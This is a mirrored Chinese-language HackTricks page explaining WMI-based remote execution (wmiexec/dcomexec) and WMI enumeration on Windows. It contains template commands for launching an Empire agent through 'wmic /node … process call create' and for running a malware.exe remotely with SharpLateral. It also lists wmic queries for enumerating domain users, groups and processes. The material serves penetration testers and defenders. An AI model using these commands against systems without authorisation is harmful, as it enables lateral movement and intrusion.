mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 13:13:41 +00:00
136 lines
6 KiB
Markdown
136 lines
6 KiB
Markdown
# WmicExec
|
||
|
||
<details>
|
||
|
||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||
|
||
其他支持HackTricks的方式:
|
||
|
||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||
|
||
</details>
|
||
|
||
## 工作原理解释
|
||
|
||
通过使用WMI,可以在已知用户名和密码或哈希的主机上打开进程。通过Wmiexec执行命令,提供半交互式的shell体验。
|
||
|
||
**dcomexec.py:** 利用不同的DCOM端点,此脚本提供类似于wmiexec.py的半交互式shell,特别是利用ShellBrowserWindow DCOM对象。目前支持MMC20。应用程序、Shell Windows和Shell Browser Window对象。(来源:[Hacking Articles](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/))
|
||
|
||
## WMI基础知识
|
||
|
||
### 命名空间
|
||
|
||
WMI的顶层容器是\root,采用类似目录样式的层次结构,其中包含额外的目录,称为命名空间。
|
||
列出命名空间的命令:
|
||
```bash
|
||
# Retrieval of Root namespaces
|
||
gwmi -namespace "root" -Class "__Namespace" | Select Name
|
||
|
||
# Enumeration of all namespaces (administrator privileges may be required)
|
||
Get-WmiObject -Class "__Namespace" -Namespace "Root" -List -Recurse 2> $null | select __Namespace | sort __Namespace
|
||
|
||
# Listing of namespaces within "root\cimv2"
|
||
Get-WmiObject -Class "__Namespace" -Namespace "root\cimv2" -List -Recurse 2> $null | select __Namespace | sort __Namespace
|
||
```
|
||
在命名空间中可以使用以下命令列出类:
|
||
```bash
|
||
gwmwi -List -Recurse # Defaults to "root\cimv2" if no namespace specified
|
||
gwmi -Namespace "root/microsoft" -List -Recurse
|
||
```
|
||
### **类**
|
||
|
||
了解 WMI 类名(例如 win32_process)及其所属的命名空间对于任何 WMI 操作都至关重要。
|
||
列出以 `win32` 开头的类的命令:
|
||
```bash
|
||
Get-WmiObject -Recurse -List -class win32* | more # Defaults to "root\cimv2"
|
||
gwmi -Namespace "root/microsoft" -List -Recurse -Class "MSFT_MpComput*"
|
||
```
|
||
调用一个类:
|
||
```bash
|
||
# Defaults to "root/cimv2" when namespace isn't specified
|
||
Get-WmiObject -Class win32_share
|
||
Get-WmiObject -Namespace "root/microsoft/windows/defender" -Class MSFT_MpComputerStatus
|
||
```
|
||
### 方法
|
||
|
||
方法是 WMI 类的一个或多个可执行函数,可以被执行。
|
||
```bash
|
||
# Class loading, method listing, and execution
|
||
$c = [wmiclass]"win32_share"
|
||
$c.methods
|
||
# To create a share: $c.Create("c:\share\path","name",0,$null,"My Description")
|
||
```
|
||
|
||
```bash
|
||
# Method listing and invocation
|
||
Invoke-WmiMethod -Class win32_share -Name Create -ArgumentList @($null, "Description", $null, "Name", $null, "c:\share\path",0)
|
||
```
|
||
## WMI枚举
|
||
|
||
### WMI服务状态
|
||
|
||
用于验证WMI服务是否正常运行的命令:
|
||
```bash
|
||
# WMI service status check
|
||
Get-Service Winmgmt
|
||
|
||
# Via CMD
|
||
net start | findstr "Instrumentation"
|
||
```
|
||
### 系统和进程信息
|
||
|
||
通过WMI收集系统和进程信息:
|
||
```bash
|
||
Get-WmiObject -ClassName win32_operatingsystem | select * | more
|
||
Get-WmiObject win32_process | Select Name, Processid
|
||
```
|
||
对于攻击者来说,WMI 是一个强大的工具,可以枚举有关系统或域的敏感数据。
|
||
```bash
|
||
wmic computerystem list full /format:list
|
||
wmic process list /format:list
|
||
wmic ntdomain list /format:list
|
||
wmic useraccount list /format:list
|
||
wmic group list /format:list
|
||
wmic sysaccount list /format:list
|
||
```
|
||
### **手动远程 WMI 查询**
|
||
|
||
通过仔细构建命令,可以远程查询 WMI 获取特定信息,如本地管理员或已登录用户。
|
||
|
||
要远程执行 WMI 上的进程,比如部署 Empire 代理,需要使用以下命令结构,成功执行将返回值为“0”:
|
||
```bash
|
||
wmic /node:hostname /user:user path win32_process call create "empire launcher string here"
|
||
```
|
||
这个过程展示了WMI远程执行和系统枚举的能力,突出了它对系统管理和渗透测试的实用性。
|
||
|
||
|
||
## 参考资料
|
||
* [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
|
||
|
||
## 自动化工具
|
||
|
||
* [**SharpLateral**](https://github.com/mertdas/SharpLateral):
|
||
|
||
{% code overflow="wrap" %}
|
||
```bash
|
||
SharpLateral redwmi HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe
|
||
```
|
||
{% endcode %}
|
||
|
||
<details>
|
||
|
||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||
|
||
支持HackTricks的其他方式:
|
||
|
||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||
|
||
</details>
|